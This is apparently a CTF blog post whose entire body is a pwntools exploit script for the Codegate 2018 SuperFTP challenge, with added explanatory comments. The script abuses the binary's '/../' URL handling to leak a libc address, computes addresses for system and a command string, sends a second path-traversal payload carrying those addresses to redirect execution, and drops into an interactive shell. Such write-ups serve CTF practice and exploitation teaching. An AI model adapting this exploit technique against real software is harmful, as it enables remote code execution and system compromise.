Pwnable/CTF

Codegate 2018 SuperFTP

HSr00t 2018. 2. 5. 18:51


from pwn import *
import os
 
# Target under test: the challenge binary, started as a local child process.
# All helpers below talk to this module-level tube `p`.
p = process('./ftp')
# Alternative target kept by the author (the live CTF service), disabled here:
#p=remote('ch41l3ng3s.codegate.kr',2121)
# Parsed ELF metadata for the same binary; not referenced anywhere else in
# the visible script.
elf = ELF('./ftp')
 
 
def join(name, age, id_, pw):
    """Select menu byte 0x01 and answer the four prompts that follow.

    Waits for ``Choice:``, sends the single raw byte 0x01 (no newline), then
    replies to four successive ``:`` prompts with *name*, ``str(age)``,
    *id_* and *pw*, each sent as a newline-terminated line.

    Presumably this is the account-registration entry (inferred from the
    helper name and its arguments; the target's menu is not shown here).
    """
    p.sendafter('Choice:', '\x01')
    # The prompts are matched only on ':', so the order of answers is what
    # ties each value to its field.
    for answer in (name, str(age), id_, pw):
        p.sendlineafter(':', answer)
 
def printf():
    """Select menu byte 0x02 once the ``Choice:`` prompt has been received.

    What the target does for this entry is not shown on this page, and the
    helper is not called anywhere in the visible script.
    """
    selector = '\x02'
    p.sendafter('Choice:', selector)
 
def login(id_, pw):
    """Select menu byte 0x03 and answer the two prompts that follow.

    Waits for ``Choice:``, sends the raw byte 0x03, then replies to two
    successive ``:`` prompts with *id_* and *pw* as newline-terminated lines.
    Presumably the authentication entry (inferred from the helper name).
    """
    p.sendafter('Choice:', '\x03')
    for credential in (id_, pw):
        p.sendlineafter(':', credential)
 
def with_():
    """Select menu byte 0x04 once the ``Choice:`` prompt has been received.

    The meaning of this entry is not established by this page, and the
    helper is not called anywhere in the visible script.
    """
    selector = '\x04'
    p.sendafter('Choice:', selector)
 
def download_files():
    """Select menu byte 0x05 once the ``Choice:`` prompt has been received.

    Presumably the file-download entry (inferred from the helper name); it
    is not called anywhere in the visible script.
    """
    selector = '\x05'
    p.sendafter('Choice:', selector)
 
def set_9020():
    """Select menu byte 0x07 once the ``Choice:`` prompt has been received.

    The script calls this immediately before ``Menu()`` in both stages.
    What "9020" refers to inside the target is not established by this
    page.
    """
    selector = '\x07'
    p.sendafter('Choice:', selector)
 
def Menu():
    """Select menu byte 0x08 once the ``Choice:`` prompt has been received.

    In the script below each call is followed by a further raw value sent
    to the target, so this entry presumably opens a sub-menu that reads its
    own selection (inferred from usage; the target is not shown here).
    """
    selector = '\x08'
    p.sendafter('Choice:', selector)
 
# Driver for the CTF challenge binary started above as `p`.
# This is Python 2 / pwntools code: it uses print statements and relies on
# str being a byte string when concatenated with p32() output.
# NOTE(review): every libc offset below is a hard-coded constant, so the
# computed addresses are only meaningful for the one libc build they were
# taken from; the script does not check which build is loaded.

# Create an account and authenticate with the same throwaway credentials.
join('AAAA',10,'AAAA','AAAA')
login('AAAA','AAAA')
# Stage 1: select entries 0x07 and 0x08, then send a 4-byte little-endian 1
# with no trailing newline.
set_9020()
Menu()
p.send('\x01\x00\x00\x00')
# URL consisting of three parent-directory segments followed by 24 filler
# bytes.
# NOTE(review): presumably the target's handling of "/../" steps back past
# the start of its URL buffer, which is the root cause being demonstrated;
# the target's code is not shown on this page, so confirm against it.
payload = '/../../../'+'B'*24
print p.recvuntil('URL:\n')
p.sendline(payload)
# Take the first 4 bytes of the response, reverse their order and decode
# them as a 32-bit value; 303 is subtracted to get what the author names
# the start of _IO_file_underflow (presumably the leaked pointer sits at
# that function +303 -- inferred from the variable name only).
IO_file_underflow = u32(p.recv(4)[::-1]) - 303
# Addresses derived from the leak using fixed, build-specific offsets.
libc_base = IO_file_underflow - 0x6b500
system = libc_base + 0x3b060
cmd = libc_base + 0x15fa0f
# NOTE(review): the name suggests an x86-64 register, but this value is
# packed with p32() like the others; the name looks like a leftover.
pop_rdi = libc_base + 0x7894f
# Print the computed addresses for a manual sanity check.
print hex(libc_base)
print hex(system)
print hex(cmd)
print hex(pop_rdi)
# Stage 2: go through entries 0x07 and 0x08 again, send a single zero byte,
# then re-enter 0x08.
set_9020()
Menu()
p.send('\x00')
Menu()
# NOTE(review): stage 1 used send() for this same 4-byte value; sendline()
# here adds a trailing newline. Unclear from this page whether that
# difference is intentional.
p.sendline('\x01\x00\x00\x00')
# Second URL: 10 filler bytes, six parent-directory segments, 48 filler
# bytes, then the three computed addresses (the last one repeated three
# times). Each packed word is byte-reversed, mirroring the reversal applied
# to the leaked bytes above; presumably the target stores or emits this
# data in reverse order -- TODO confirm against the binary.
payload = 'B'*10+'/../../../../../../'+'A'*48+p32(cmd)[::-1]+p32(pop_rdi)[::-1]+p32(system)[::-1]*3
p.sendline(payload)
 
 
# Hand the process's stdin/stdout over to the operator's terminal.
p.interactive()